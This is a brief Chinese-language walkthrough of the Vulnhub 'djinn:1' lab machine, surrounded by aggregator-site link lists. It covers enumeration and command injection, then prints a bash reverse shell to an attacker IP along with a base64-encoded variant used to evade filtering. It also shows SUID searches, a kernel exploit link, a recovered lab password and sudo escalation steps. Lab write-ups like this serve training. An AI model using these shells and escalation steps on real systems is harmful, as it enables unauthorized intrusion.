djinn:1 Vulnhub Walkthrough
靶機下載連接:shell
https://download.vulnhub.com/djinn/djinn.ovabash
主機端口掃描:tcp
FTP發現一些文件提示編碼
1337端口是一個遊戲,去看下server
哈哈有點難,暫時放棄,看看7331HTTP server 這邊有麼有發現blog
使用dirb dirsearch 自帶字典沒有發現,加大字段枚舉下目錄遊戲
命令執行ip
反彈shell bash -i >& /dev/tcp/10.10.202.142/1234 0>&1一直彈不出來,猜想特殊字符作了過濾terminal
base64 編碼執行cmd
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4yMDIuMTQyLzEyMzQgMD4mMQ== | base64 -d | bash
接下來進行提權操做
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
內核:Linux djinn 4.15.0-66-generic
exp提權失敗:https://www.exploit-db.com/download/47163
路徑/home/nitish/.dev/creds.txt
nitish:p4ssw0rdStr3r0n9 密碼
切換用戶可能會提示:su: must be run from a terminal
執行此命令:/usr/bin/script -qc /bin/bash /dev/null
sudo - u sam genie -cmd new
OVER!!
相關文章
- 1. Sunset-Sunrise: Vulnhub Walkthrough
- 2. HA: Dhanush Vulnhub Walkthrough
- 3. HA: Chakravyuh Vulnhub Walkthrough
- 4. Sunset: dusk: Vulnhub Walkthrough
- 5. Girlfreind:1 Vulnhub Walkthrough
- 6. Happycorp:1 Vulnhub Walkthrough
- 7. Sunset: Nightfall Vulnhub Walkthrough
- 8. HA: Chanakya Vulnhub Walkthrough
- 9. HA Joker Vulnhub Walkthrough
- 10. Matrix-3: Vulnhub Walkthrough
- 更多相關文章...
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. 跳槽面試的幾個實用小技巧,不妨看看!
- 2. Mac實用技巧 |如何使用Mac系統中自帶的預覽工具將圖片變成黑白色?
- 3. Mac實用技巧 |如何使用Mac系統中自帶的預覽工具將圖片變成黑白色?
- 4. 如何使用Mac系統中自帶的預覽工具將圖片變成黑白色?
- 5. Mac OS非兼容Windows軟件運行解決方案——「以VMware & Microsoft Access爲例「
- 6. 封裝 pyinstaller -F -i b.ico excel.py
- 7. 數據庫作業三ER圖待完善
- 8. nvm安裝使用低版本node.js(非命令安裝)
- 9. 如何快速轉換圖片格式
- 10. 將表格內容分條轉換爲若干文檔
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. Sunset-Sunrise: Vulnhub Walkthrough
- 2. HA: Dhanush Vulnhub Walkthrough
- 3. HA: Chakravyuh Vulnhub Walkthrough
- 4. Sunset: dusk: Vulnhub Walkthrough
- 5. Girlfreind:1 Vulnhub Walkthrough
- 6. Happycorp:1 Vulnhub Walkthrough
- 7. Sunset: Nightfall Vulnhub Walkthrough
- 8. HA: Chanakya Vulnhub Walkthrough
- 9. HA Joker Vulnhub Walkthrough
- 10. Matrix-3: Vulnhub Walkthrough